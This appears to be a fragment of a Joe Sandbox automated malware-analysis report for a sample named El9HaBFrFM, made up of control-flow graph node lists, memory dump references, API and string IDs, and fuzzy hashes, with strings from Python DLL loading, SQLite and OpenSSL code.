1566->1569 1567->1562 1570 7ff6ba3bbdf9-7ff6ba3bbe09 1568->1570 1569->1568 1571 7ff6ba3bbde2-7ff6ba3bbde6 1569->1571 1570->1565 1572 7ff6ba3bbe0b 1570->1572 1571->1568 1573 7ff6ba3bbde8-7ff6ba3bbdf1 1571->1573 1572->1562 1573->1570
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 498042b8bade30e16a632e5d5190c2e48e6397d1dbcd995b40cfaaf51afd2612
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83C1BE22A0CF8692EA609F1995402BD7B96FB81B80FD543B5EF4EC7791CE7CE8458700

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                                        • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                                                                                        • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                                                                                                        • Instruction ID: d4ae6c1f5732abe56ea102d3ee9fa16a361613dadb982520e3734562492fd192
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB41A131A18AA691EF10DB69E8551ED6316FF44384F800172EF5CC36A6EF3CE645C340

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                        control_flow_graph 1754 7ffdfb0cffd0-7ffdfb0d001c 1755 7ffdfb0d0021-7ffdfb0d0094 1754->1755 1756 7ffdfb0d00bb-7ffdfb0d00cb call 7ffdfb0cd020 1755->1756 1757 7ffdfb0d0096-7ffdfb0d00a5 call 7ffdfb0cfa10 1755->1757 1764 7ffdfb0d00d1-7ffdfb0d00fa 1756->1764 1765 7ffdfb0d05d2-7ffdfb0d05d5 1756->1765 1762 7ffdfb0d00ab-7ffdfb0d00b6 1757->1762 1763 7ffdfb0d0637-7ffdfb0d065a call 7ffdfb1f2900 1757->1763 1762->1756 1766 7ffdfb0d0100-7ffdfb0d0115 1764->1766 1768 7ffdfb0d05d7-7ffdfb0d05de 1765->1768 1769 7ffdfb0d0632 1765->1769 1776 7ffdfb0d0117-7ffdfb0d0123 1766->1776 1777 7ffdfb0d0152-7ffdfb0d015c 1766->1777 1771 7ffdfb0d0629 1768->1771 1772 7ffdfb0d05e0-7ffdfb0d05ea 1768->1772 1769->1763 1771->1769 1774 7ffdfb0d05ec 1772->1774 1775 7ffdfb0d05f2-7ffdfb0d061f 1772->1775 1774->1775 1775->1769 1790 7ffdfb0d0621-7ffdfb0d0627 1775->1790 1778 7ffdfb0d0166-7ffdfb0d0181 1776->1778 1789 7ffdfb0d0125-7ffdfb0d012b 1776->1789 1777->1778 1779 7ffdfb0d015e-7ffdfb0d0160 1777->1779 1782 7ffdfb0d018a-7ffdfb0d0193 1778->1782 1783 7ffdfb0d0183-7ffdfb0d0188 1778->1783 1779->1778 1781 7ffdfb0d03a8-7ffdfb0d03af 1779->1781 1786 7ffdfb0d03fa 1781->1786 1787 7ffdfb0d03b1-7ffdfb0d03bb 1781->1787 1788 7ffdfb0d0196-7ffdfb0d01aa call 7ffdfb186ad0 1782->1788 1783->1788 1798 7ffdfb0d0403 1786->1798 1791 7ffdfb0d03c3-7ffdfb0d03f0 1787->1791 1792 7ffdfb0d03bd 1787->1792 1803 7ffdfb0d01ac-7ffdfb0d01c6 call 7ffdfb13df90 1788->1803 1804 7ffdfb0d01c8 1788->1804 1794 7ffdfb0d0133-7ffdfb0d0136 1789->1794 1795 7ffdfb0d012d-7ffdfb0d0131 1789->1795 1790->1769 1800 7ffdfb0d040a-7ffdfb0d040d 1791->1800 1819 7ffdfb0d03f2-7ffdfb0d03f8 1791->1819 1792->1791 1796 7ffdfb0d0138-7ffdfb0d013d 1794->1796 1797 7ffdfb0d013f-7ffdfb0d0150 1794->1797 1795->1794 1795->1797 1796->1778 1796->1797 1797->1766 1798->1800 1806 7ffdfb0d046b-7ffdfb0d0470 1800->1806 1807 7ffdfb0d040f-7ffdfb0d0416 1800->1807 1805 7ffdfb0d01ca-7ffdfb0d01ec 1803->1805 1804->1805 1810 7ffdfb0d01f0-7ffdfb0d0217 CreateFileW 1805->1810 1806->1763 1811 7ffdfb0d0418-7ffdfb0d041b 1807->1811 1812 7ffdfb0d0462 1807->1812 1815 7ffdfb0d021d-7ffdfb0d021f 1810->1815 1816 7ffdfb0d02c0 1810->1816 1817 7ffdfb0d0423-7ffdfb0d0450 1811->1817 1818 7ffdfb0d041d 1811->1818 1812->1806 1820 7ffdfb0d0221-7ffdfb0d0233 1815->1820 1821 7ffdfb0d026f-7ffdfb0d027c 1815->1821 1822 7ffdfb0d02c4-7ffdfb0d02c7 1816->1822 1817->1806 1847 7ffdfb0d0452-7ffdfb0d045d 1817->1847 1818->1817 1819->1798 1823 7ffdfb0d0235 1820->1823 1824 7ffdfb0d0237-7ffdfb0d025d call 7ffdfb0d0800 1820->1824 1834 7ffdfb0d02bc-7ffdfb0d02be 1821->1834 1835 7ffdfb0d027e-7ffdfb0d0284 1821->1835 1826 7ffdfb0d02c9-7ffdfb0d02f2 call 7ffdfb0c9340 1822->1826 1827 7ffdfb0d02f7-7ffdfb0d02fb 1822->1827 1823->1824 1845 7ffdfb0d0261-7ffdfb0d0263 1824->1845 1846 7ffdfb0d025f 1824->1846 1826->1827 1832 7ffdfb0d0301-7ffdfb0d0311 call 7ffdfb0c6320 1827->1832 1833 7ffdfb0d04af-7ffdfb0d04bd 1827->1833 1848 7ffdfb0d0313-7ffdfb0d031a 1832->1848 1849 7ffdfb0d036e-7ffdfb0d0373 1832->1849 1836 7ffdfb0d04cd-7ffdfb0d04e6 call 7ffdfb0c6320 1833->1836 1837 7ffdfb0d04bf-7ffdfb0d04cb 1833->1837 1834->1822 1842 7ffdfb0d0296-7ffdfb0d0299 1835->1842 1843 7ffdfb0d0286-7ffdfb0d0294 1835->1843 1859 7ffdfb0d04e8-7ffdfb0d04ef 1836->1859 1860 7ffdfb0d0543-7ffdfb0d0546 1836->1860 1837->1836 1850 7ffdfb0d02a2-7ffdfb0d02b7 1842->1850 1851 7ffdfb0d029b-7ffdfb0d02a0 1842->1851 1843->1842 1843->1850 1853 7ffdfb0d026b 1845->1853 1854 7ffdfb0d0265-7ffdfb0d0269 1845->1854 1846->1845 1847->1763 1857 7ffdfb0d031c-7ffdfb0d0326 1848->1857 1858 7ffdfb0d0365 1848->1858 1855 7ffdfb0d0379-7ffdfb0d037e 1849->1855 1856 7ffdfb0d0475-7ffdfb0d04aa call 7ffdfb0cd810 call 7ffdfb185ae0 1849->1856 1850->1810 1851->1834 1851->1850 1853->1821 1854->1816 1854->1853 1855->1856 1862 7ffdfb0d0384-7ffdfb0d03a3 1855->1862 1856->1763 1864 7ffdfb0d0328 1857->1864 1865 7ffdfb0d032e-7ffdfb0d035b 1857->1865 1858->1849 1869 7ffdfb0d053a 1859->1869 1870 7ffdfb0d04f1-7ffdfb0d04fb 1859->1870 1867 7ffdfb0d0548-7ffdfb0d054b 1860->1867 1868 7ffdfb0d054d 1860->1868 1862->1755 1864->1865 1865->1849 1887 7ffdfb0d035d-7ffdfb0d0363 1865->1887 1872 7ffdfb0d0554-7ffdfb0d056c 1867->1872 1868->1872 1869->1860 1873 7ffdfb0d0503-7ffdfb0d0530 1870->1873 1874 7ffdfb0d04fd 1870->1874 1877 7ffdfb0d0572-7ffdfb0d057a 1872->1877 1878 7ffdfb0d056e 1872->1878 1873->1860 1890 7ffdfb0d0532-7ffdfb0d0538 1873->1890 1874->1873 1881 7ffdfb0d05aa-7ffdfb0d05d0 1877->1881 1882 7ffdfb0d057c-7ffdfb0d0590 call 7ffdfb186ad0 1877->1882 1878->1877 1881->1763 1888 7ffdfb0d05a6 1882->1888 1889 7ffdfb0d0592-7ffdfb0d05a4 call 7ffdfb13df90 1882->1889 1887->1849 1888->1881 1889->1881 1889->1888 1890->1860
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                        • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                                                                                                                        • API String ID: 823142352-3829269058
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9fa68a4d019e543b82f48475598e9f337480dd6f5aee3ec3198131acb147343e
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 52af07bafc975a2644948bd790a1591550986678943a7f048196efe7e0a4722e
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fa68a4d019e543b82f48475598e9f337480dd6f5aee3ec3198131acb147343e
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9027021B0F64386FB548B21A874B7967A0FF8AB54F444235ED6E826F8DF3CE8459704
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010$FileRead
                                                                                                                                                                                                                                                                                                                        • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                                                                                                        • API String ID: 1751861923-1843600136
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 66d7818fc9c6dce62004362554e4c0cfd5c82727d3bea9d87ae7196a0384542c
                                                                                                                                                                                                                                                                                                                        • Instruction ID: b402aa12c8d4e1e184b1cc096676894ef4e25ce40fa06763d8201f04155c7833
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 66d7818fc9c6dce62004362554e4c0cfd5c82727d3bea9d87ae7196a0384542c
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E412262B0968382E7108F15A8509B97BA5FB84784F404232EA6D836FCDF3CE5429340
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 1279662727-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3bcf7c6ed53aca5c20e386785a37e803a8de415a3a2e6e4b6f39c6d92f09cd9e
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16419F22E18B8283E7509B2895103697261FB947A4F509375EF9DC3AD2EF7CA5E08700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                                        • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_read_n
                                                                                                                                                                                                                                                                                                                        • API String ID: 1452528299-4226281315
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 72c0e7aa6cb440006a06cd762c0773f9cb24828254b5c2bc54d82e6e819b576e
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 860c721c02d510f97b093061ed71e03b6993c9e32b1db845b0e59148b57f3ed7
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72c0e7aa6cb440006a06cd762c0773f9cb24828254b5c2bc54d82e6e819b576e
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37A16C25B0878641FB5DAF25D820BB937A0EF44B88F944176DE6D0BACDDF38D44A8310
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                                        • String ID: ..\s\ssl\statem\statem.c$state_machine
                                                                                                                                                                                                                                                                                                                        • API String ID: 1452528299-1722249466
                                                                                                                                                                                                                                                                                                                        • Opcode ID: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 01c715055451c529d7dbb4d8584f5d5cf3f2acd84d0af4d2c8423743d1ca06b0
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7A18321B0C65385FB6DAA35D461BBD2290FF41B45F9C80B2DD2D466DECE3CE8428361
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                                        • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_pending
                                                                                                                                                                                                                                                                                                                        • API String ID: 1452528299-1219543453
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
                                                                                                                                                                                                                                                                                                                        • Instruction ID: eaf5885d02131ec018303b88a7a8661bae068e1f56a4a0ffa57ed54c9d29dd1e
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A419F62B09B8282EB6C9F15D464BBD3390FB48B84F5441B6DA6C07BD9DF3DE4569300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3251591375-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 335ff39f3f99ffed34338f133bd4613ad11c62b4299f03c747fc64c91a1b93d7
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0313B21E0C66785FE54ABADD4623BD67839F41384F4845B4EF0ECB2E3DE6CA8058350
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
